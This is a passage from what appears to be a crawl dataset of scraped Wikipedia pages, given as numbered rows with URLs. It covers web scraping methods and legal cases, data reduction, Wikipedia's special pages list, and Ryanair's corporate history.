and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
584 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_reduction | Data reduction is the transformation of numerical or alphabetical digital information derived empirically or experimentally into a corrected, ordered, and simplified form. The purpose of data reduction can be two-fold: reduce the number of data records by eliminating invalid data or produce summary data and statistics at different aggregation levels for various applications. 1 Data reduction does not necessarily mean loss of information. For example, the body mass index reduces two dimensions (body and mass) into a single measure, without any information being lost in the process. When information is derived from instrument readings there may also be a transformation from analog to digital form. When the data are already in digital form the 'reduction' of the data typically involves some editing, scaling, encoding, sorting, collating, and producing tabular summaries. When the observations are discrete but the underlying phenomenon is continuous then smoothing and interpolation are often needed. The data reduction is often undertaken in the presence of reading or measurement errors. Some idea of the nature of these errors is needed before the most likely value may be determined. An example in astronomy is the data reduction in the Kepler satellite. This satellite records 95 megapixel images once every six seconds, generating dozens of megabytes of data per second, which is orders-of-magnitudes more than the downlink bandwidth of 550 kB s. The on-board data reduction encompasses co-adding the raw frames for thirty minutes, reducing the bandwidth by a factor of 300. Furthermore, interesting targets are pre-selected and only the relevant pixels are processed, which is 6% of the total. This reduced data is then sent to Earth where it is processed further. Research has also been carried out on the use of data reduction in wearable (wireless) devices for health monitoring and diagnosis applications. For example, in the context of epilepsy diagnosis, data reduction has been used to increase the battery lifetime of a wearable EEG device by selecting and only transmitting EEG data that is relevant for diagnosis and discarding background activity. 2 When dimensionality increases, data becomes increasingly sparse while density and distance between points, critical to clustering and outlier analysis, becomes less meaningful. Dimensionality reduction helps reduce noise in the data and allows for easier visualization, such as the example below where 3 dimensional data is transformed into 2 dimensions to show hidden parts. One method of dimensionality reduction is wavelet transform, in which data is transformed to preserve relative distance between objects at different levels of resolution, and is often used for image compression. 3 This method of data reduction reduces the data volume by choosing alternate, smaller forms of data representation. Numerosity reduction can be split into 2 groups: parametric and non-parametric methods. Parametric methods (regression, for example) assume the data fits some model, estimate model parameters, store only the parameters, and discard the data. One example of this is in the image below, where the volume of data to be processed is reduced based on more specific criteria. Another example would be a log-linear model, obtaining a value at a point in m-D space as the product on appropriate marginal subspaces. Non-parametric methods do not assume models, some examples being histograms, clustering, sampling, etc. 4 Data reduction can be obtained by assuming a statistical model for the data. Classical principles of data reduction include sufficiency, likelihood, conditionality and equivariance. 5 |
585 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:SpecialPages | This page contains a list of special pages. Most of the content of these pages is automatically generated and cannot be edited. To suggest a change to the parts that can be edited, find the appropriate text on Special:AllMessages and then request your change on the talk page of the message (using editprotected to draw the attention of administrators). You can also see what message names are used on a page by adding ?uselang qqx to the end of its URL, e.g. https: en.wikipedia.org wiki Special:SpecialPages?uselang qqx will show (specialpages-summary) in place of this message, which allows you to find MediaWiki:Specialpages-summary. For an index of special pages, see Help:SpecialPages. |
586 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Ryanair | Ryanair is an Irish ultra low-cost carrier group headquartered in Swords, Dublin, Ireland. 12 The parent company Ryanair Holdings plc includes subsidiaries Ryanair DACTooltip Designated activity company, 13 Malta Air, Buzz, Lauda Europe and Ryanair UK. Ryanair DAC, the oldest airline of the group, was founded in 1984. 11 Ryanair Holdings was established in 1996 as a holding company for Ryanair with the two companies having the same board of directors and executive officers. 14 In 2019 the transition began from the airline Ryanair and its subsidiaries into separate sister airlines under the holding company. 15 Later in 2019 Malta Air joined Ryanair Holdings. 16 Ryanair has been characterised by its rapid expansion, a result of the deregulation of the aviation industry in Europe in 1997 and the success of its low-cost business model. The group operates more than 500 planes. 17 Its route network serves over 40 countries in Europe, North Africa (Morocco, Canary Islands), and the Middle East (Israel and Jordan). 18 The primary operational bases are at Dublin, London Stansted and Milan Bergamo airports. 19 Ryanair is Ireland's biggest airline 20 and in 2016 became the world's largest airline by scheduled international passengers. 21 The company has at times been criticised for its refusal to issue invoices for the VAT-exempt services it provides (airfares), 22 poor working conditions, 23 24 25 heavy use of extra charges, 26 27 28 poor customer service, 29 30 and tendency to intentionally generate controversy in order to gain publicity. 31 32 33 Since its establishment in 1984, 11 Ryanair has grown from a small airline, flying the short journey from Waterford to London Gatwick, into Europe's largest carrier. There have been over 19,000 people working for the company, most employed and contracted by agencies to fly on Ryanair aircraft. 34 35 The airline went public in 1997, 36 and the money raised was used to expand the airline into a pan-European carrier. Revenues have risen from 640 million in 2003 to 4.66 billion in 2010. 37 Similarly, net profits have increased from 48 million to 339 million over the same period. 38 Ryanair was founded in 1984 as "Danren Enterprises" 11 by Christopher Ryan, Liam Lonergan (owner of Irish travel agent Club Travel), and Irish businessman Tony Ryan, founder of Guinness Peat Aviation. 39 40 The airline was shortly renamed "Ryanair". 11 It began operations in 1985 flying a 15 seat Embraer Bandeirante turboprop aircraft between Waterford and Gatwick Airport. 41 42 The first chief executive was Eugene O'Neill (1956 2018), who had formerly worked as managing director of Ryan's Sunday Tribune newspaper and as Ryan's personal assistant. O'Neill was talented at marketing but did not focus on costs, and the airline lost money in its early years. Ryan vetoed O'Neill's proposal to take Aer Lingus to the European Commission for breach of competition rules, because at the time Aer Lingus was state-owned and Ryanair depended on the Irish government for its route licences. 43 44 Ryan sacked O'Neill in September 1987, who sued for wrongful dismissal. 43 In 1986, the company added a second route from Dublin to Luton, thus directly competing with the Aer Lingus British Airways duopoly for the first time. Under partial European Economic Community (EEC) deregulation, airlines could begin new international intra-EEC services as long as one of the two governments approved (the so-called "double-disapproval" regime). The Irish government at the time refused its approval to protect Aer Lingus, but Britain, under Margaret Thatcher's deregulating Conservative government, approved the service. With two routes and two aircraft, the fledgling airline carried 82,000 passengers in one year. 45 44 46 In 1986, the directors of Ryanair took an 85% stake in London European Airways. From 1987, this provided a connection with the Luton Ryanair service onward to Amsterdam and Brussels. 47 In 1988, London European operated as Ryanair Europe and later began to operate charter services. 48 49 That same year, Michael O'Leary joined the company as chief financial officer. 50 In 1989, a Short Sandringham was operated with Ryanair sponsorship titles but never flew revenue-generating services for the airline. 51 Due to decreasing profits, the company restructured in 1990, copying the low-fares model of Southwest Airlines, after O'Leary visited the company. 50 In 1992, the European Union's deregulation of the air industry in Europe gave carriers from one EU country the right to operate scheduled services between other EU states and represented a major opportunity for Ryanair. 52 After a successful flotation on the Dublin and the NASDAQ stock exchanges, the airline launched services to Stockholm, Sandefjord Airport, Torp (110 km south of Oslo), Beauvais Till northwest of Paris, and Charleroi near Brussels. 53 In 1998, flush with new capital, the airline placed a massive US$2 bn order for 45 new Boeing 737 800 series aircraft. 54 In 1994, Michael O'Leary became the sixth chief executive officer. 55 Ryan clashed with O'Leary, with Ryan wanting the airline's PR stunts to be less aggressive, and O'Leary suggesting that Ryan should leave the board. 56 The airline launched its website in 2000, with online booking initially said to be a small and unimportant part of the software supporting the site. Increasingly online booking contributed to the aim of cutting flight prices by selling directly to passengers and excluding the costs imposed by travel agents. Within a year, the website was handling three-quarters of all bookings. By December 2023 the website hit 40M monthly visits. 57 Ryanair launched a new base of operation in Charleroi Airport in 2001. Later that year, the airline ordered 155 new 737 800 aircraft from Boeing at what was believed to be a substantial discount, to be delivered over eight years from 2002 to 2010. 58 Approximately 100 of these aircraft had been delivered by the end of 2005, although there were slight delays in late 2005 caused by production disruptions arising from a Boeing machinists' strike. 59 In April 2003, Ryanair acquired its ailing competitor Buzz from KLM. 60 During 2004, Michael O'Leary warned of a "bloodbath" during the winter from which only two or three low-cost airlines would emerge, the expectation is that these would be Ryanair and EasyJet. 61 A loss of 3.3 million in the second quarter of 2004 was the airline's first recorded loss for 15 years but the airline became profitable soon after. The enlargement of the European Union on 1 May 2004 opened the way to more new routes for Ryanair. 62 The rapid addition of new routes and new bases has enabled growth in passenger numbers and made Ryanair among the largest carriers on European routes. In August 2005, the airline claimed to have carried 20% more passengers within Europe than British Airways. 63 For the six months ending on 30 September 2006, passenger traffic grew by more than a fifth to 22.1 million passengers and revenues rose by a third to 1.256 billion. 64 On 13 February 2006, Britain's Channel 4 broadcast a documentary as part of its Dispatches series, "Ryanair caught napping". The documentary criticised Ryanair's training policies, security procedures and aircraft hygiene, and highlighted poor staff morale. Ryanair denied the allegations 65 and claimed that promotional materials, in particular a photograph of a stewardess sleeping, had been faked by Dispatches. 66 On 5 October 2006, Ryanair launched a 1.48 billion ( 1 billion; $1.9 billion) bid to buy fellow Irish flag carrier Aer Lingus. On 5 October 2006, Aer Lingus rejected Ryanair's takeover bid, saying it was contradictory. 67 Ryanair's CEO, Michael O'Leary, stated in April 2007 that Ryanair planned to launch a new long-haul airline around 2009. 68 The new airline would be separate from Ryanair and operate under different branding. It would offer both low costs with fares starting at 10.00 and a business class service which would be much more expensive, intended to rival airlines like Virgin Atlantic. The new airline would operate from Ryanair's existing bases in Europe to approximately six new bases in the United States. The new American bases will not be main bases such as New York's JFK airport, but smaller airports located outside major cities. Since the Boeing 787 was sold out of production until at least 2012, and the Airbus A350 XWB will not enter service until 2014, this contributed to a delay in the airline's launch. It was said that the name of the new airline would be RyanAtlantic and it would sell tickets through the Ryanair website under an alliance agreement. 69 In February 2010, O'Leary said the launch would be delayed until 2014, at the earliest, because of the shortage of suitable, cheap aircraft. 70 71 In August 2007, the company started charging passengers to check in at the airport, therefore reversing its policy of paying for online check-in. It says that cutting airport check-in reduces overhead costs. 72 73 In October 2008, Ryanair withdrew operations from a base in Europe for the first time when it closed its base in Valencia, Spain. 74 Ryanair estimated the closure cost 750 jobs. 75 On 1 December 2008, Ryanair launched a second takeover bid of Aer Lingus, offering an all-cash offer of 748 million ( 619 mils; US$950 million). The offer was a 28% premium on the value of Aer Lingus stock, during the preceding 30 days. Ryanair said, "Aer Lingus, as a small, stand-alone, regional airline, has been marginalised and bypassed, as most other EU flag carriers consolidate. The two airlines would operate separately. Ryanair stated it would double the Aer Lingus short-haul fleet from 33 to 66 and create 1,000 new jobs. 76 77 78 The Aer Lingus board rejected the offer and advised its shareholders to take no action. 79 On 22 January 2009, Ryanair walked away from the Aer Lingus takeover bid after it was rejected by the Irish government on the grounds it undervalued the airline and would harm competition. 80 However, Ryanair retained a stake in Aer Lingus; in October 2010, competition regulators in the UK opened an inquiry, due to concerns that Ryanair's stake may lead to a reduction in competition. 81 In 2009, Ryanair announced that it was in talks with Boeing and Airbus about an order that could include up to 200 aircraft. Even though Ryanair had dealt with Boeing aircraft up to that point, Michael O'Leary said he would buy Airbus aircraft if it offered a better deal. Airbus Chief Commercial Officer John Leahy denied in February 2009 that any negotiations were taking place. 82 On 21 February 2009, Ryanair confirmed it was planning to close all check-in desks by the start of 2010. Michael O'Leary, Ryanair's chief executive, said passengers would be able to leave their luggage at a bag drop, but everything else would be done online. This became reality in October 2009. 83 In June 2009, Ryanair reported its first annual loss, with a loss posted of 169 million for the financial year ending 31 March. 84 In November 2009, Ryanair announced that negotiations with Boeing had proceeded poorly and that Ryanair was thinking of stopping the negotiations, then putting at 200 aircraft for delivery between 2013 and 2016, and simply returning cash to shareholders. 85 Boeing's competitor Airbus was mentioned again as an alternative vendor for Ryanair, but both Michael O'Leary and Airbus CCO John Leahy dismissed this. 86 In December 2009, Ryanair confirmed that negotiations with Boeing had indeed failed. Plans were to take all 112 aircraft already on order at that point, with the last deliveries occurring in 2012, for a total fleet of over 300. Ryanair confirmed that an agreement had been met on price, but it had failed to agree on conditions, as Ryanair had wanted to carry forward certain conditions from its previous contract. 87 In April 2010, after a week of flight disruption in Europe caused by the 2010 eruptions of Eyjafjallaj kull in Iceland, Ryanair decided to end refusals to comply with EU regulations which stated it was obliged to reimburse stranded passengers. 88 In a company statement released on 22 April 2010, Ryanair described the regulations as 'unfair'. On 29 April 2010, Ryanair cancelled all of its routes from Budapest Liszt Ferenc Airport after talks with the airport's management on reducing fees failed. As the airport is the only one serving Budapest, there is no lower-cost airport nearby. In June 2010, Ryanair called for the Irish government to scrap its tourist tax, implying it was destroying tourism in Ireland. 89 In August 2010, Ryanair held a press conference in Plovdiv and announced its first-ever Bulgarian destination connecting Plovdiv with London Stansted. The service was planned to start in November 2010 with two flights weekly. 90 In late 2010, Ryanair began withdrawing all routes from its smallest base, Belfast City, and Shannon due to increased airport fees. 91 In the last three months of 2010, Ryanair made a loss of 10.3 million, compared with a loss of 10.9 million in the same period the previous year. More than 3,000 flights were cancelled in the quarter. Ryanair blamed the losses on strikes and flight cancellations due to severe weather. 92 In March 2011, Ryanair opened a new maintenance hangar at Glasgow Prestwick International Airport, making it Ryanair's biggest fleet maintenance base. In June 2011, Ryanair and COMAC signed an agreement to cooperate on the development of the C 919, a Boeing 737 competitor. 93 Ryanair cut capacity by grounding 80 aircraft between November 2011 and April 2012 due to the high cost of fuel and continuing weak economic conditions. 94 On 19 June 2012, Ryanair Chief Executive Michael O'Leary announced his intention to make an all-cash offer for Aer Lingus. The bid was blocked by the European Commission in 2017, which had also blocked an earlier bid. 95 According to research in October 2013, Ryanair was the cheapest low-cost airline in Europe in basic price (excluding fees) but was the fourth cheapest when fees were included. 96 97 On 25 October 2013, Ryanair announced what it described as a series of "customer service improvements", to take place over the next six months. These included lower fees for reprinting boarding passes, free changes of minor errors on bookings within 24 hours, and a free second small carry-on bag. Ryanair said it was making the changes as a result of customer feedback. 98 On 27 January 2014, Ryanair moved into a new 20m, 100,000 sq ft Dublin head office in Airside Business Park, having outgrown its previous office within Dublin Airport. 99 The building was officially opened on Thursday 3 April 2014 by the then Taoiseach Enda Kenny, Minister for Finance Michael Noonan and the Lord Mayor of Dublin Oisin Quinn. On 8 September 2014, Ryanair agreed to purchase up to 200 Boeing 737 MAX 8s (100 confirmed and 100 options) for over $22 billion. 100 The airline confirmed plans to open an operating base at Milan Malpensa Airport in December 2015, initially with one aircraft. 101 On 9 March 2016, Ryanair launched a corporate jet charter service, offering a Boeing 737 700 for corporate or group hire. 102 103 In November 2016, Ryanair launched a new package holiday service named Ryanair Holidays. The new service offers flights, accommodation, and transfer packages. The service was launched in Ireland, the United Kingdom and Germany, with other markets to follow. 104 Ryanair partnered with Spain-based tour operator, Logitravel, and accommodation provider, World2Meet, to create Ryanair Holidays. 105 In April 2017, Ryanair started issuing tickets for connecting flights, meaning if a connection is missed, the customer will be rebooked at no extra cost and compensated according to the EU Flight Compensation Regulation. To begin with, such tickets were only sold for flights with connections at Rome-Fiumicino airport. 106 107 In 2017, the company announced plans to add 50 new aircraft to its fleet every year for the next five years, aiming to reach 160 million passengers by the early 2020s, up from 120 million passengers. 108 For over a decade, Ryanair had only operated with its Irish Air Operator's Certificate and solely under the Ryanair brand. However, starting in 2018 the airline began introducing additional brands and operating on multiple certificates in different countries. In 2017, Ryanair announced that it would launch an independent Polish subsidiary in 2018, operating charter flights from Poland to Mediterranean destinations. Aside from turning away from the company's policy of only operating on a single Air Operator's Certificate, the step also meant that Ryanair would be launching charter flights after having focused only on scheduled operations before. 109 The subsidiary was branded Ryanair Sun and received its Polish Air Operator's Certificate in April 2018 and subsequently launched 110 Initially, it had only one former Ryanair Boeing 737 800 and complemented its operation with wet-leased aircraft from its mother company. In late 2018, Ryanair Sun was expanded by transferring all Polish-based Ryanair aircraft to it. The decision was made in the wake of staff costs and unions. clarification needed 111 As a consequence, Ryanair Sun mainly operated scheduled flights on behalf of its mother company using Ryanair's FR flight numbers. Ryanair Sun was rebranded Buzz in 2019. 112 Also in 2018, Ryanair expanded its portfolio with Austrian-based Laudamotion, later renamed "Lauda". Laudamotion was the successor of Niki, which had folded as a consequence of the Air Berlin demise. 113 The company was founded by Niki Lauda. 113 Initially, Ryanair purchased a 25 per cent share in Laudamotion to increase the share to 75 per cent pending government approval. The deal was announced in March 2018 ahead of the carrier's launch in June 2018. 114 After increasing its share to 75 per cent, Ryanair fully acquired the Austrian airline in December 2018. 115 Ryanair UK was established in December 2017 in anticipation of Brexit. Its first aircraft, G-RUKA, was transferred from Ryanair DAC in 2018, with a second aircraft following in 2019. As of April 2023, Ryanair UK has 13 aircraft. On 23 Aug 2018, Ryanair announced a new baggage policy. Under this policy, Priority Boarding allows for a larger and a smaller bag, capped by the capacity on the airplane. The company claimed this reduces turnaround times and simplifies the baggage policy. 116 non-primary source needed After this, many other low cost airlines introduced similar policies, for example Wizz Air. 117 non-primary source needed On 28 September 2018, pilots, cabin crew and other staff called for a strike due to the transition from workers being employed on Irish contracts and subject to Irish legislation to their own countries' labour laws, along with an issue in their pay. Due to the lobbying of the crew and walk-outs of pilots, the airline had to cancel 250 flights, which affected around 40,000 passengers. 118 119 In early 2019 due to the transition inside the holdings company, each airline (Ryanair, LaudaMotion, Ryanair Sun and Ryanair UK) got its own CEO and management team. 15 Edward Wilson became the CEO of the airline Ryanair and Michael O'Leary became the Group CEO. 120 On 9 June 2019, Ryanair announced, together with the Government of Malta, that it would establish a new airline called Malta Air (not to be confused with Air Malta), which will consist of an initial fleet of ten aircraft and assume the 61 flights currently operated by Ryanair from the island. The fleet was registered in Malta while a new repair and maintenance hangar was also set up. 121 122 Ryanair transferred all its existing Maltese operations to the new airline and its fleet was expected to increase from the six Boeing 737 800 aircraft currently allocated to the Malta market to ten (all to be in Malta Air colours) by mid 2020. 123 The carrier's CEO made comments at the A4E Aviation Summit in Brussels on 3 March 2020. Michael O'Leary said that he expected people to get 'bored' of the COVID 19 pandemic and saw a recovery by the summer of 2020. 124 That changed, with Ryanair announcing in a statement that it expected demand to return to 2019 levels by the summer of 2022. 125 The COVID 19 pandemic had a significant impact on Ryanair. While the CEO, Michael O'Leary, remained adamant that state aid was not an option, the carrier announced several changes to its operations. This included the loss of 3000 jobs, announced on 1 May 2020, which affected mainly pilots and cabin crew. This came as the airline announced it would suspend the majority of its operations until June 2020. 125 In July 2020, Ryanair's CEO, Michael O'Leary announced that the company had made a net loss of 185 million in the period April June 2020. In comparison, in the same period of 2019, the firm made a net profit of 243 million. 126 In September 2020, the airline threatened to leave Ireland due to COVID 19 restrictions. 127 Despite their original plan, to fly 60% of the previous year's schedule, in October 2020, the company decided to reduce the number of flights between the period of November 2020 March 2021 to 40%. According to O'Leary, this was a result of "government mismanagement of EU air travel" as the quarantine travel measures were loosened. 128 By the end of December 2020, the airline reported an 83% drop in annual passengers, from 2019. 129 In December 2020, Ryanair increased its order for Boeing 737 MAX 8 aircraft by 75, to a total of 210 aircraft, for delivery from early 2021 to December 2024. 130 Due to the persisting COVID 19 pandemic, Ryanair expected losses of between 800m and 850m in their fiscal year of 2021. Only 27.5 million passengers flew compared to 148.6 million passengers in the previous financial year. The full financial report was released on 17 May 2021. 131 The company reported a record annual loss of $989 million. 132 In May 2023 Ryanair confirmed an order with Boeing to purchase 300 Boeing 737 MAX 10 aircraft, with a total list price of $40 billion ( 36.3bn). The deal included 150 firm orders and options for 150 more, for delivery between 2027 and 2033. Half of this order would replace withdrawn 737 800s. 133 The order followed an 18 month public argument with Boeing over pricing, and Ryanair ultimately achieved a lower discount than their previous orders. 134 While Ryanair had previously returned cash to shareholders via share buybacks and one-off distributions, they announced their first regular dividend in November 2023. 135 In December 2023, Ryanair became the most valuable airline in the world and the largest airline outside the US. 136 In 2024, they were again the "largest player in the region". 137 138 Ryanair announced a $1.4 billion investment in Morocco for its Summer 2024 schedule, its largest in the country, including over 1,100 weekly flights on 175 routes, with 35 new ones. This expansion features Ryanair's introduction of ultra-low fares on 11 domestic routes - a first in Africa, aiming to boost internal connectivity and traffic growth. The plan includes a new base in Tangier with two aircraft and first flights to Beni Mellal and Errachidia. The investment, expected to deliver over 5 million passengers, supports over 500 direct jobs and stimulates economic growth across 12 cities. Ryanair's CEO, Eddie Wilson, highlighted the partnership's role in enhancing tourism and connectivity with fares from MAD330 each way. 139 The key trends for the Ryanair Group are (as of the financial year ending 31 March): 140 141 In 2023 the group had about 6,600 pilots and 13,400 cabin crew, 2,200 employees in administration, IT labs, ground operations and maintenance as well as 125 employees in the management. 160 The head office of Ryanair has been in the Airside Business Park in Swords, County Dublin, Ireland, since 2014. 161 David Daly, a developer, had built the facility before Ryanair's 2012 purchase. 162 The building has 100,000 square feet (9,300 m2) of space, 163 and the airline paid 11 million to occupy the building. According to John Mulligan of the Irish Independent, it was thought that 